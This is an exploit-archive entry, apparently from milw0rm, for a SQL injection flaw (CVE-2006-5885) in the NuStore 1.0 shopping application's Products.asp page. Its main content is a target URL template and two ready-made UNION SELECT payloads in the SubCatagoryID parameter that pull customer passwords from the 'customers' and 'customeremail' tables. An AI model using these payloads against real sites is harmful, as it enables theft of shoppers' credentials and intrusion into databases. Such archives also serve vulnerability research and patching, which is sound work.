NuStore 1.0 - 'Products.asp' SQL Injection



EKU-ID: 10755 CVE: OSVDB-30328;CVE-2006-5885 OSVDB-ID:
Author: ajann Published: 2006-11-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


*******************************************************************************
# Title  :  NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[  SQL ]

Example:

//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-11]